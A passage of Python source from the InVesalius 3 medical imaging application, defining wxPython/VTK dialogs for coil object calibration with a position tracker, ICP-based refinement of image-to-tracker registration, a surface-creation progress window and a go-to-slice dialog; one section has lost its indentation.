                self.std_density.SetValue(s)
                self.Update()
                self.Refresh()
                if future.done():
                    break
                time.sleep(0.1)
            _min, _max, _mean, _std = future.result()
            self.mean_density.SetValue(str(_mean))
            self.min_density.SetValue(str(_min))
            self.max_density.SetValue(str(_max))
            self.std_density.SetValue(str(_std))
class ObjectCalibrationDialog(wx.Dialog):
    def __init__(self, tracker, pedal_connection):
        """Initialise calibration state, build the GUI, load the object model
        and subscribe to the fiducial-setting message.

        tracker: tracker wrapper queried via GetTrackerInfo() for init data
            and tracker id.
        pedal_connection: pedal device connection used during calibration.
        """
        self.tracker = tracker
        self.pedal_connection = pedal_connection
        self.trk_init, self.tracker_id = tracker.GetTrackerInfo()
        self.obj_ref_id = 2
        self.obj_name = None
        self.polydata = None
        self.use_default_object = False
        self.object_fiducial_being_set = None
        # Five object fiducials: 3D positions and orientations, NaN until set.
        self.obj_fiducials = np.full([5, 3], np.nan)
        self.obj_orients = np.full([5, 3], np.nan)
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Object calibration"), size=(450, 440),
                           style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self._init_gui()
        self.LoadObject()
        self.__bind_events()
    def __bind_events(self):
        """Subscribe to the pubsub message that sets an object fiducial."""
        Publisher.subscribe(self.SetObjectFiducial, 'Set object fiducial')
def _init_gui(self):
self.interactor = wxVTKRenderWindowInteractor(self, -1, size=self.GetSize())
self.interactor.Enable(1)
self.ren = vtk.vtkRenderer()
self.interactor.GetRenderWindow().AddRenderer(self.ren)
# Initialize list of buttons and txtctrls for wx objects
self.btns_coord = [None] * 5
self.text_actors = [None] * 5
self.ball_actors = [None] * 5
self.txt_coord = [list(), list(), list(), list(), list()]
# ComboBox for tracker reference mode
tooltip = wx.ToolTip(_(u"Choose the object reference mode"))
choice_ref = wx.ComboBox(self, -1, "", size=wx.Size(90, 23),
choices=const.REF_MODE, style=wx.CB_DROPDOWN | wx.CB_READONLY)
choice_ref.SetToolTip(tooltip)
choice_ref.Bind(wx.EVT_COMBOBOX, self.OnChooseReferenceMode)
choice_ref.SetSelection(1)
choice_ref.Enable(1)
if self.tracker_id == const.PATRIOT or self.tracker_id == const.ISOTRAKII:
self.obj_ref_id = 0
choice_ref.SetSelection(0)
choice_ref.Enable(0)
# ComboBox for sensor selection for FASTRAK
tooltip = wx.ToolTip(_(u"Choose the FASTRAK sensor port"))
choice_sensor = wx.ComboBox(self, -1, "", size=wx.Size(90, 23),
choices=const.FT_SENSOR_MODE, style=wx.CB_DROPDOWN | wx.CB_READONLY)
choice_sensor.SetSelection(0)
choice_sensor.SetToolTip(tooltip)
choice_sensor.Bind(wx.EVT_COMBOBOX, self.OnChoiceFTSensor)
if self.tracker_id in [const.FASTRAK, const.DEBUGTRACKRANDOM, const.DEBUGTRACKAPPROACH]:
choice_sensor.Show(True)
else:
choice_sensor.Show(False)
self.choice_sensor = choice_sensor
# Buttons to finish or cancel object registration
tooltip = wx.ToolTip(_(u"Registration done"))
# btn_ok = wx.Button(self, -1, _(u"Done"), size=wx.Size(90, 30))
btn_ok = wx.Button(self, wx.ID_OK, _(u"Done"), size=wx.Size(90, 30))
btn_ok.SetToolTip(tooltip)
extra_sizer = wx.FlexGridSizer(rows=3, cols=1, hgap=5, vgap=30)
extra_sizer.AddMany([choice_ref,
btn_ok,
choice_sensor])
# Push buttons for object fiducials
for object_fiducial in const.OBJECT_FIDUCIALS:
index = object_fiducial['fiducial_index']
label = object_fiducial['label']
button_id = object_fiducial['button_id']
tip = object_fiducial['tip']
ctrl = wx.ToggleButton(self, button_id, label=label, size=wx.Size(60, 23))
ctrl.SetToolTip(wx.ToolTip(tip))
ctrl.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnObjectFiducialButton, index, ctrl=ctrl))
self.btns_coord[index] = ctrl
for m in range(0, 5):
for n in range(0, 3):
self.txt_coord[m].append(wx.StaticText(self, -1, label='-',
style=wx.ALIGN_RIGHT, size=wx.Size(40, 23)))
coord_sizer = wx.GridBagSizer(hgap=20, vgap=5)
for m in range(0, 5):
coord_sizer.Add(self.btns_coord[m], pos=wx.GBPosition(m, 0))
for n in range(0, 3):
coord_sizer.Add(self.txt_coord[m][n], pos=wx.GBPosition(m, n + 1), flag=wx.TOP, border=5)
group_sizer = wx.FlexGridSizer(rows=1, cols=2, hgap=50, vgap=5)
group_sizer.AddMany([(coord_sizer, 0, wx.LEFT, 20),
(extra_sizer, 0, wx.LEFT, 10)])
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.interactor, 0, wx.EXPAND)
main_sizer.Add(group_sizer, 0,
wx.EXPAND|wx.GROW|wx.LEFT|wx.TOP|wx.RIGHT|wx.BOTTOM, 10)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
def ObjectImportDialog(self):
msg = _("Would like to use InVesalius default object?")
if sys.platform == 'darwin':
dlg = wx.MessageDialog(None, "", msg,
wx.ICON_QUESTION | wx.YES_NO)
else:
dlg = wx.MessageDialog(None, msg,
"InVesalius 3",
wx.ICON_QUESTION | wx.YES_NO)
answer = dlg.ShowModal()
dlg.Destroy()
if answer == wx.ID_YES:
return 1
else: # answer == wx.ID_NO:
return 0
def LoadObject(self):
self.use_default_object = self.ObjectImportDialog()
if not self.use_default_object:
filename = ShowImportMeshFilesDialog()
if filename:
if filename.lower().endswith('.stl'):
reader = vtk.vtkSTLReader()
elif filename.lower().endswith('.ply'):
reader = vtk.vtkPLYReader()
elif filename.lower().endswith('.obj'):
reader = vtk.vtkOBJReader()
elif filename.lower().endswith('.vtp'):
reader = vtk.vtkXMLPolyDataReader()
else:
wx.MessageBox(_("File format not recognized by InVesalius"), _("Import surface error"))
return
else:
filename = os.path.join(inv_paths.OBJ_DIR, "magstim_fig8_coil.stl")
reader = vtk.vtkSTLReader()
# XXX: If the user cancels the dialog for importing the coil mesh file, the current behavior is to
# use the default object after all. A more logical behavior in that case would be to cancel the
# whole object calibration, but implementing that would need larger refactoring.
#
self.use_default_object = True
else:
filename = os.path.join(inv_paths.OBJ_DIR, "magstim_fig8_coil.stl")
reader = vtk.vtkSTLReader()
if _has_win32api:
self.obj_name = win32api.GetShortPathName(filename).encode(const.FS_ENCODE)
else:
self.obj_name = filename.encode(const.FS_ENCODE)
reader.SetFileName(self.obj_name)
reader.Update()
polydata = reader.GetOutput()
self.polydata = polydata
if polydata.GetNumberOfPoints() == 0:
wx.MessageBox(_("InVesalius was not able to import this surface"), _("Import surface error"))
transform = vtk.vtkTransform()
transform.RotateZ(90)
transform_filt = vtk.vtkTransformPolyDataFilter()
transform_filt.SetTransform(transform)
transform_filt.SetInputData(polydata)
transform_filt.Update()
normals = vtk.vtkPolyDataNormals()
normals.SetInputData(transform_filt.GetOutput())
normals.SetFeatureAngle(80)
normals.AutoOrientNormalsOn()
normals.Update()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(normals.GetOutput())
mapper.ScalarVisibilityOff()
#mapper.ImmediateModeRenderingOn()
obj_actor = vtk.vtkActor()
obj_actor.SetMapper(mapper)
self.ball_actors[0], self.text_actors[0] = self.OnCreateObjectText('Left', (0,55,0))
self.ball_actors[1], self.text_actors[1] = self.OnCreateObjectText('Right', (0,-55,0))
self.ball_actors[2], self.text_actors[2] = self.OnCreateObjectText('Anterior', (23,0,0))
self.ren.AddActor(obj_actor)
self.ren.ResetCamera()
self.interactor.Render()
def OnCreateObjectText(self, name, coord):
ball_source = vtk.vtkSphereSource()
ball_source.SetRadius(3)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(ball_source.GetOutputPort())
ball_actor = vtk.vtkActor()
ball_actor.SetMapper(mapper)
ball_actor.SetPosition(coord)
ball_actor.GetProperty().SetColor(1, 0, 0)
textSource = vtk.vtkVectorText()
textSource.SetText(name)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(textSource.GetOutputPort())
tactor = vtk.vtkFollower()
tactor.SetMapper(mapper)
tactor.GetProperty().SetColor(1.0, 0.0, 0.0)
tactor.SetScale(5)
ball_position = ball_actor.GetPosition()
tactor.SetPosition(ball_position[0]+5, ball_position[1]+5, ball_position[2]+10)
self.ren.AddActor(tactor)
tactor.SetCamera(self.ren.GetActiveCamera())
self.ren.AddActor(ball_actor)
return ball_actor, tactor
def OnObjectFiducialButton(self, index, evt, ctrl):
if not self.tracker.IsTrackerInitialized():
ShowNavigationTrackerWarning(0, 'choose')
return
# TODO: The code below until the end of the function is essentially copy-paste from
# OnTrackerFiducials function in NeuronavigationPanel class. Probably the easiest
# way to deduplicate this would be to create a Fiducial class, which would contain
# this code just once.
#
# Do not allow several object fiducials to be set at the same time.
if self.object_fiducial_being_set is not None and self.object_fiducial_being_set != index:
ctrl.SetValue(False)
return
# Called when the button for setting the object fiducial is enabled and either pedal is pressed
# or the button is pressed again.
#
def set_fiducial_callback(state):
if state:
Publisher.sendMessage('Set object fiducial', fiducial_index=index)
ctrl.SetValue(False)
self.object_fiducial_being_set = None
if ctrl.GetValue():
self.object_fiducial_being_set = index
if self.pedal_connection is not None:
self.pedal_connection.add_callback(
name='fiducial',
callback=set_fiducial_callback,
remove_when_released=True,
)
else:
set_fiducial_callback(True)
if self.pedal_connection is not None:
self.pedal_connection.remove_callback(name='fiducial')
def SetObjectFiducial(self, fiducial_index):
coord, coord_raw = self.tracker.GetTrackerCoordinates(
# XXX: Always use static reference mode when getting the coordinates. This is what the
# code did previously, as well. At some point, it should probably be thought through
# if this is actually what we want or if it should be changed somehow.
#
ref_mode_id=const.STATIC_REF,
n_samples=const.CALIBRATION_TRACKER_SAMPLES,
)
# XXX: The condition below happens when setting the "fixed" coordinate in the object calibration.
# The case is not handled by GetTrackerCoordinates function, therefore redo some computation
# that is already done once by GetTrackerCoordinates, namely, invert the y-coordinate.
#
# (What is done here does not seem to be completely consistent with "always use static reference
# mode" principle above, but it's hard to come up with a simple change to increase the consistency
# and not change the function to the point of potentially breaking it.)
#
if self.obj_ref_id and fiducial_index == 4:
if self.tracker_id == const.ROBOT:
trck_init_robot = self.trk_init[1][0]
coord = trck_init_robot.Run()
else:
coord = coord_raw[self.obj_ref_id, :]
else:
coord = coord_raw[0, :]
if fiducial_index == 3:
coord = np.zeros([6,])
# Update text controls with tracker coordinates
if coord is not None or np.sum(coord) != 0.0:
self.obj_fiducials[fiducial_index, :] = coord[:3]
self.obj_orients[fiducial_index, :] = coord[3:]
for i in [0, 1, 2]:
self.txt_coord[fiducial_index][i].SetLabel(str(round(coord[i], 1)))
if self.text_actors[fiducial_index]:
self.text_actors[fiducial_index].GetProperty().SetColor(0.0, 1.0, 0.0)
self.ball_actors[fiducial_index].GetProperty().SetColor(0.0, 1.0, 0.0)
self.Refresh()
else:
ShowNavigationTrackerWarning(0, 'choose')
def OnChooseReferenceMode(self, evt):
# When ref mode is changed the tracker coordinates are set to nan
# This is for Polhemus FASTRAK wrapper, where the sensor attached to the object can be the stylus (Static
# reference - Selection 0 - index 0 for coordinates) or can be a 3rd sensor (Dynamic reference - Selection 1 -
# index 2 for coordinates)
# I use the index 2 directly here to send to the coregistration module where it is possible to access without
# any conditional statement the correct index of coordinates.
if evt.GetSelection() == 1:
self.obj_ref_id = 2
if self.tracker_id in [const.FASTRAK, const.DEBUGTRACKRANDOM, const.DEBUGTRACKAPPROACH]:
self.choice_sensor.Show(self.obj_ref_id)
else:
self.obj_ref_id = 0
self.choice_sensor.Show(self.obj_ref_id)
for m in range(0, 5):
self.obj_fiducials[m, :] = np.full([1, 3], np.nan)
self.obj_orients[m, :] = np.full([1, 3], np.nan)
for n in range(0, 3):
self.txt_coord[m][n].SetLabel('-')
# Used to update choice sensor controls
self.Layout()
def OnChoiceFTSensor(self, evt):
if evt.GetSelection():
self.obj_ref_id = 3
else:
self.obj_ref_id = 0
def GetValue(self):
return self.obj_fiducials, self.obj_orients, self.obj_ref_id, self.obj_name, self.polydata, self.use_default_object
class ICPCorregistrationDialog(wx.Dialog):
    """Dialog to refine image-to-tracker registration with ICP.

    The user touches the head surface with the tracked probe to collect a
    point cloud, then runs Iterative Closest Point against the selected
    surface mesh. GetValue() returns the refinement matrix, the raw and
    transformed points, and the before/after mean errors.
    """

    def __init__(self, nav_prop):
        import invesalius.project as prj
        # nav_prop = (image-to-tracker change matrix, tracker instance).
        self.m_change = nav_prop[0]
        self.tracker = nav_prop[1]
        self.obj_ref_id = 2
        self.obj_name = None
        self.obj_actor = None
        self.polydata = None
        self.m_icp = None
        self.initial_focus = None
        self.prev_error = None
        self.final_error = None
        # 0 = Affine, 1 = Similarity, 2 = RigidBody (see OnICP).
        self.icp_mode = 0
        self.staticballs = []
        self.point_coord = []
        self.transformed_points = []
        self.obj_fiducials = np.full([5, 3], np.nan)
        self.obj_orients = np.full([5, 3], np.nan)
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Refine Corregistration"), size=(380, 440),
                           style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self.proj = prj.Project()
        self._init_gui()

    def _init_gui(self):
        """Build the VTK view, surface/mode combos, acquisition buttons and
        the progress gauge."""
        self.interactor = wxVTKRenderWindowInteractor(self, -1, size=self.GetSize())
        self.interactor.Enable(1)
        self.ren = vtk.vtkRenderer()
        self.interactor.GetRenderWindow().AddRenderer(self.ren)
        # Timer drives continuous point acquisition (see OnContinuousAcquisition).
        self.timer = wx.Timer(self)
        self.Bind(wx.EVT_TIMER, self.OnUpdate, self.timer)
        txt_surface = wx.StaticText(self, -1, _('Select the surface:'))
        txt_mode = wx.StaticText(self, -1, _('Registration mode:'))
        combo_surface_name = wx.ComboBox(self, -1, size=(210, 23),
                                         style=wx.CB_DROPDOWN | wx.CB_READONLY)
        # combo_surface_name.SetSelection(0)
        if sys.platform != 'win32':
            combo_surface_name.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
        combo_surface_name.Bind(wx.EVT_COMBOBOX, self.OnComboName)
        for n in range(len(self.proj.surface_dict)):
            combo_surface_name.Insert(str(self.proj.surface_dict[n].name), n)
        self.combo_surface_name = combo_surface_name
        init_surface = 0
        combo_surface_name.SetSelection(init_surface)
        self.surface = self.proj.surface_dict[init_surface].polydata
        self.LoadActor()
        tooltip = wx.ToolTip(_("Choose the registration mode:"))
        choice_icp_method = wx.ComboBox(self, -1, "", size=(100, 23),
                                        choices=([_("Affine"), _("Similarity"), _("RigidBody")]),
                                        style=wx.CB_DROPDOWN|wx.CB_READONLY)
        choice_icp_method.SetSelection(0)
        choice_icp_method.SetToolTip(tooltip)
        choice_icp_method.Bind(wx.EVT_COMBOBOX, self.OnChoiceICPMethod)
        # Buttons to acquire and remove points
        create_point = wx.Button(self, -1, label=_('Create point'))
        create_point.Bind(wx.EVT_BUTTON, self.OnCreatePoint)
        cont_point = wx.ToggleButton(self, -1, label=_('Continuous acquisition'))
        cont_point.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnContinuousAcquisition, btn=cont_point))
        self.cont_point = cont_point
        btn_reset = wx.Button(self, -1, label=_('Remove points'))
        btn_reset.Bind(wx.EVT_BUTTON, self.OnReset)
        btn_apply_icp = wx.Button(self, -1, label=_('Apply registration'))
        btn_apply_icp.Bind(wx.EVT_BUTTON, self.OnICP)
        # Disabled until at least 5 points are acquired (see AddMarker).
        btn_apply_icp.Enable(False)
        self.btn_apply_icp = btn_apply_icp
        tooltip = wx.ToolTip(_(u"Refine done"))
        btn_ok = wx.Button(self, wx.ID_OK, _(u"Done"))
        btn_ok.SetToolTip(tooltip)
        btn_ok.Enable(False)
        self.btn_ok = btn_ok
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        top_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=50, vgap=5)
        top_sizer.AddMany([txt_surface, txt_mode,
                           combo_surface_name, choice_icp_method])
        btn_acqui_sizer = wx.FlexGridSizer(rows=1, cols=3, hgap=15, vgap=15)
        btn_acqui_sizer.AddMany([create_point, cont_point, btn_reset])
        btn_ok_sizer = wx.FlexGridSizer(rows=1, cols=3, hgap=20, vgap=20)
        btn_ok_sizer.AddMany([btn_apply_icp, btn_ok, btn_cancel])
        btn_sizer = wx.FlexGridSizer(rows=2, cols=1, hgap=50, vgap=20)
        btn_sizer.AddMany([(btn_acqui_sizer, 1, wx.ALIGN_CENTER_HORIZONTAL),
                           (btn_ok_sizer, 1, wx.ALIGN_RIGHT)])
        self.progress = wx.Gauge(self, -1)
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        main_sizer.Add(top_sizer, 0, wx.LEFT|wx.TOP|wx.BOTTOM, 10)
        main_sizer.Add(self.interactor, 0, wx.EXPAND)
        main_sizer.Add(btn_sizer, 0,
                       wx.EXPAND|wx.GROW|wx.LEFT|wx.TOP|wx.BOTTOM, 10)
        main_sizer.Add(self.progress, 0, wx.EXPAND | wx.ALL, 5)
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)

    def LoadActor(self):
        '''
        Load the selected actor from the project (self.surface) into the scene
        :return:
        '''
        mapper = vtk.vtkPolyDataMapper()
        mapper.SetInputData(self.surface)
        mapper.ScalarVisibilityOff()
        #mapper.ImmediateModeRenderingOn()
        obj_actor = vtk.vtkActor()
        obj_actor.SetMapper(mapper)
        self.obj_actor = obj_actor
        poses_recorded = vtku.Text()
        poses_recorded.SetSize(const.TEXT_SIZE_LARGE)
        poses_recorded.SetPosition((const.X, const.Y))
        poses_recorded.ShadowOff()
        poses_recorded.SetValue("Poses recorded: ")
        collect_points = vtku.Text()
        collect_points.SetSize(const.TEXT_SIZE_LARGE)
        collect_points.SetPosition((const.X+0.35, const.Y))
        collect_points.ShadowOff()
        # On-screen counter of acquired points; incremented in AddMarker.
        collect_points.SetValue("0")
        self.collect_points = collect_points
        self.ren.AddActor(obj_actor)
        self.ren.AddActor(poses_recorded.actor)
        self.ren.AddActor(collect_points.actor)
        self.ren.ResetCamera()
        self.interactor.Render()

    def RemoveActor(self):
        """Clear the scene and all acquired/derived state, disabling the
        Apply/Done buttons again."""
        self.ren.RemoveAllViewProps()
        self.point_coord = []
        self.transformed_points = []
        self.m_icp = None
        self.SetProgress(0)
        self.btn_apply_icp.Enable(False)
        self.btn_ok.Enable(False)
        self.ren.ResetCamera()
        self.interactor.Render()

    def GetCurrentCoord(self):
        """Sample the tracker and return the probe tip position (x, y, z)
        in image space, via dynamic coregistration with self.m_change."""
        coord_raw, markers_flag = self.tracker.TrackerCoordinates.GetCoordinates()
        coord, _ = dcr.corregistrate_dynamic((self.m_change, 0), coord_raw, const.DEFAULT_REF_MODE, [None, None])
        return coord[:3]

    def AddMarker(self, size, colour, coord):
        """
        Points are rendered into the scene. These points give visual information about the registration.
        :param size: value of the marker size
        :type size: int
        :param colour: RGB Color Code for the marker
        :type colour: tuple (int(R),int(G),int(B))
        :param coord: x, y, z of the marker
        :type coord: np.ndarray
        """
        # y is negated to match the VTK scene orientation.
        x, y, z = coord[0], -coord[1], coord[2]
        ball_ref = vtk.vtkSphereSource()
        ball_ref.SetRadius(size)
        ball_ref.SetCenter(x, y, z)
        mapper = vtk.vtkPolyDataMapper()
        mapper.SetInputConnection(ball_ref.GetOutputPort())
        prop = vtk.vtkProperty()
        prop.SetColor(colour[0:3])
        #adding a new actor for the present ball
        sphere_actor = vtk.vtkActor()
        sphere_actor.SetMapper(mapper)
        sphere_actor.SetProperty(prop)
        self.ren.AddActor(sphere_actor)
        self.point_coord.append([x, y, z])
        self.collect_points.SetValue(str(int(self.collect_points.GetValue()) + 1))
        self.interactor.Render()
        # ICP needs at least 5 points before it can be applied.
        if len(self.point_coord) >= 5 and self.btn_apply_icp.IsEnabled() is False:
            self.btn_apply_icp.Enable(True)
        if self.progress.GetValue() != 0:
            self.SetProgress(0)

    def SetProgress(self, progress):
        # NOTE(review): wx.Gauge.SetValue expects an int; progress*100 may be
        # a float here — confirm the wx build in use tolerates it.
        self.progress.SetValue(progress * 100)
        self.interactor.Render()

    def vtkmatrix_to_numpy(self, matrix):
        """
        Copies the elements of a vtkMatrix4x4 into a numpy array.
        :param matrix: The matrix to be copied into an array.
        :type matrix: vtk.vtkMatrix4x4
        :rtype: numpy.ndarray
        """
        m = np.ones((4, 4))
        for i in range(4):
            for j in range(4):
                m[i, j] = matrix.GetElement(i, j)
        return m

    def SetCameraVolume(self, position):
        """
        Positioning of the camera based on the acquired point
        :param position: x, y, z of the last acquired point
        :return:
        """
        cam_focus = np.array([position[0], -position[1], position[2]])
        cam = self.ren.GetActiveCamera()
        if self.initial_focus is None:
            self.initial_focus = np.array(cam.GetFocalPoint())
        cam_pos0 = np.array(cam.GetPosition())
        cam_focus0 = np.array(cam.GetFocalPoint())
        # NOTE(review): inner1d historically comes from the deprecated
        # numpy.core.umath_tests; np.dot(v, v) is the supported equivalent —
        # confirm where this file imports it from.
        v0 = cam_pos0 - cam_focus0
        v0n = np.sqrt(inner1d(v0, v0))
        v1 = (cam_focus - self.initial_focus)
        v1n = np.sqrt(inner1d(v1, v1))
        if not v1n:
            # Avoid division by zero when the focus has not moved.
            v1n = 1.0
        cam_pos = (v1/v1n)*v0n + cam_focus
        cam.SetFocalPoint(cam_focus)
        cam.SetPosition(cam_pos)
        self.interactor.Render()

    def ErrorEstimation(self, surface, points):
        """
        Estimation of the average squared distance between the cloud of points to the closest mesh
        :param surface: Surface polydata of the scene
        :type surface: vtk.polydata
        :param points: Cloud of points
        :type points: np.ndarray
        :return: mean distance
        """
        cell_locator = vtk.vtkCellLocator()
        cell_locator.SetDataSet(surface)
        cell_locator.BuildLocator()
        cellId = vtk.mutable(0)
        c = [0.0, 0.0, 0.0]
        subId = vtk.mutable(0)
        d = vtk.mutable(0.0)
        error = []
        for i in range(len(points)):
            # FindClosestPoint writes the squared distance into d.
            cell_locator.FindClosestPoint(points[i], c, cellId, subId, d)
            error.append(np.sqrt(float(d)))
        return np.mean(error)

    def OnComboName(self, evt):
        """Surface combo handler: swap the displayed mesh (resets points)."""
        surface_name = evt.GetString()
        surface_index = evt.GetSelection()
        self.surface = self.proj.surface_dict[surface_index].polydata
        if self.obj_actor:
            self.RemoveActor()
        self.LoadActor()

    def OnChoiceICPMethod(self, evt):
        self.icp_mode = evt.GetSelection()

    def OnContinuousAcquisition(self, evt=None, btn=None):
        # Toggle: acquire one point every 500 ms while the button is down.
        value = btn.GetValue()
        if value:
            self.timer.Start(500)
        else:
            self.timer.Stop()

    def OnUpdate(self, evt):
        # Timer tick: acquire the current probe position as a new point.
        current_coord = self.GetCurrentCoord()
        self.AddMarker(3, (1, 0, 0), current_coord)
        self.SetCameraVolume(current_coord)

    def OnCreatePoint(self, evt):
        # Manual single-point acquisition.
        current_coord = self.GetCurrentCoord()
        self.AddMarker(3, (1, 0, 0), current_coord)
        self.SetCameraVolume(current_coord)

    def OnReset(self, evt):
        """Stop any continuous acquisition and clear all acquired points."""
        if self.cont_point:
            self.cont_point.SetValue(False)
            self.OnContinuousAcquisition(evt=None, btn=self.cont_point)
        self.RemoveActor()
        self.LoadActor()

    def OnICP(self, evt):
        """Run ICP between the acquired points and the surface, render the
        transformed points in green, and compute before/after errors."""
        if self.cont_point:
            self.cont_point.SetValue(False)
            self.OnContinuousAcquisition(evt=None, btn=self.cont_point)
        self.SetProgress(0.3)
        # NOTE(review): cosmetic pause; blocks the UI thread for 1 s.
        time.sleep(1)
        sourcePoints = np.array(self.point_coord)
        sourcePoints_vtk = vtk.vtkPoints()
        for i in range(len(sourcePoints)):
            id0 = sourcePoints_vtk.InsertNextPoint(sourcePoints[i])
        source = vtk.vtkPolyData()
        source.SetPoints(sourcePoints_vtk)
        icp = vtk.vtkIterativeClosestPointTransform()
        icp.SetSource(source)
        icp.SetTarget(self.surface)
        self.SetProgress(0.5)
        if self.icp_mode == 0:
            print("Affine mode")
            icp.GetLandmarkTransform().SetModeToAffine()
        elif self.icp_mode == 1:
            print("Similarity mode")
            icp.GetLandmarkTransform().SetModeToSimilarity()
        elif self.icp_mode == 2:
            print("Rigid mode")
            icp.GetLandmarkTransform().SetModeToRigidBody()
        #icp.DebugOn()
        icp.SetMaximumNumberOfIterations(1000)
        icp.Modified()
        icp.Update()
        self.m_icp = self.vtkmatrix_to_numpy(icp.GetMatrix())
        icpTransformFilter = vtk.vtkTransformPolyDataFilter()
        icpTransformFilter.SetInputData(source)
        icpTransformFilter.SetTransform(icp)
        icpTransformFilter.Update()
        transformedSource = icpTransformFilter.GetOutput()
        # Render each transformed point as a small green sphere.
        for i in range(transformedSource.GetNumberOfPoints()):
            p = [0, 0, 0]
            transformedSource.GetPoint(i, p)
            self.transformed_points.append(p)
            point = vtk.vtkSphereSource()
            point.SetCenter(p)
            point.SetRadius(3)
            point.SetPhiResolution(3)
            point.SetThetaResolution(3)
            mapper = vtk.vtkPolyDataMapper()
            mapper.SetInputConnection(point.GetOutputPort())
            actor = vtk.vtkActor()
            actor.SetMapper(mapper)
            actor.GetProperty().SetColor((0,1,0))
            self.ren.AddActor(actor)
        self.prev_error = self.ErrorEstimation(self.surface, sourcePoints)
        self.final_error = self.ErrorEstimation(self.surface, self.transformed_points)
        self.interactor.Render()
        self.SetProgress(1)
        self.btn_ok.Enable(True)

    def GetValue(self):
        """Return (icp matrix, raw points, transformed points, error before,
        error after)."""
        return self.m_icp, self.point_coord, self.transformed_points, self.prev_error, self.final_error
class SurfaceProgressWindow(object):
    """Indeterminate progress dialog shown while a 3D surface is created.

    Wraps wx.ProgressDialog in pulse mode; the caller polls WasCancelled()
    and calls Update()/Close().
    """

    def __init__(self):
        self.title = "InVesalius 3"
        self.msg = _("Creating 3D surface ...")
        # Fix: the original OR'ed wx.PD_APP_MODAL in twice; listed once here
        # (OR-ing the same flag twice is a no-op, but it was clearly a typo).
        self.style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME
        self.dlg = wx.ProgressDialog(self.title,
                                     self.msg,
                                     parent=None,
                                     style=self.style)
        self.running = True
        self.error = None
        self.dlg.Show()

    def WasCancelled(self):
        """Return True if the user pressed the dialog's abort button."""
        # print("Cancelled?", self.dlg.WasCancelled())
        return self.dlg.WasCancelled()

    def Update(self, msg=None, value=None):
        """Pulse the progress bar, optionally updating the message.

        `value` is accepted for interface compatibility but unused: the
        dialog runs in indeterminate (pulse) mode.
        """
        if msg is None:
            self.dlg.Pulse()
        else:
            self.dlg.Pulse(msg)

    def Close(self):
        """Destroy the underlying wx dialog."""
        self.dlg.Destroy()
class GoToDialog(wx.Dialog):
    """Dialog to jump to a given slice number in a chosen orientation."""

    def __init__(self, title=_("Go to slice ..."), init_orientation=const.AXIAL_STR):
        wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
        self._init_gui(init_orientation)

    def _init_gui(self, init_orientation):
        """Build the slice-number field and orientation combo, preselecting
        *init_orientation*."""
        orientations = (
            (_("Axial"), const.AXIAL_STR),
            (_("Coronal"), const.CORONAL_STR),
            (_("Sagital"), const.SAGITAL_STR),
        )
        self.goto_slice = wx.TextCtrl(self, -1, "")
        self.goto_orientation = wx.ComboBox(self, -1, style=wx.CB_DROPDOWN|wx.CB_READONLY)
        cb_init = 0
        for n, orientation in enumerate(orientations):
            # Append(label, client_data): translated label shown, raw
            # orientation id stored for retrieval in OnOk.
            self.goto_orientation.Append(*orientation)
            if orientation[1] == init_orientation:
                cb_init = n
        self.goto_orientation.SetSelection(cb_init)
        btn_ok = wx.Button(self, wx.ID_OK)
        btn_ok.SetHelpText("")
        btn_ok.SetDefault()
        btn_cancel = wx.Button(self, wx.ID_CANCEL)
        btn_cancel.SetHelpText("")
        btnsizer = wx.StdDialogButtonSizer()
        btnsizer.AddButton(btn_ok)
        btnsizer.AddButton(btn_cancel)
        btnsizer.Realize()
        main_sizer = wx.BoxSizer(wx.VERTICAL)
        slice_sizer = wx.BoxSizer(wx.HORIZONTAL)
        slice_sizer.Add(wx.StaticText(self, -1, _("Slice number"), style=wx.ALIGN_CENTER), 0, wx.ALIGN_CENTER|wx.RIGHT, 5)
        slice_sizer.Add(self.goto_slice, 1, wx.EXPAND)
        main_sizer.Add((5, 5))
        main_sizer.Add(slice_sizer, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(self.goto_orientation, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
        main_sizer.Add((5, 5))
        main_sizer.Add(btnsizer, 0, wx.EXPAND)
        main_sizer.Add((5, 5))
        self.SetSizer(main_sizer)
        main_sizer.Fit(self)
        self.orientation = None
        self.__bind_events()
        btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)

    def __bind_events(self):
        Publisher.subscribe(self.SetNewFocalPoint,'Cross focal point')

    def OnOk(self, evt):
        """Scroll the chosen view to the typed slice number.

        A non-integer slice number raises ValueError, which is deliberately
        swallowed so the dialog just closes without scrolling.
        """
        try:
            slice_number = int(self.goto_slice.GetValue())
            orientation = self.orientation = self.goto_orientation.GetClientData(self.goto_orientation.GetSelection())
            # The scroll topic is a tuple: it is orientation-specific.
            Publisher.sendMessage(("Set scroll position", orientation), index=slice_number)
            Publisher.sendMessage('Set Update cross pos')
        except ValueError:
            pass
        self.Close()

    def SetNewFocalPoint(self, coord, spacing):
        """'Cross focal point' subscriber: replace the coordinate of the
        chosen axis with slice_index * spacing along that axis.

        NOTE(review): re-reads and int()s the text field; assumes OnOk has
        already validated it — confirm this cannot fire with bad input.
        """
        newCoord = list(coord)
        if self.orientation=='AXIAL':
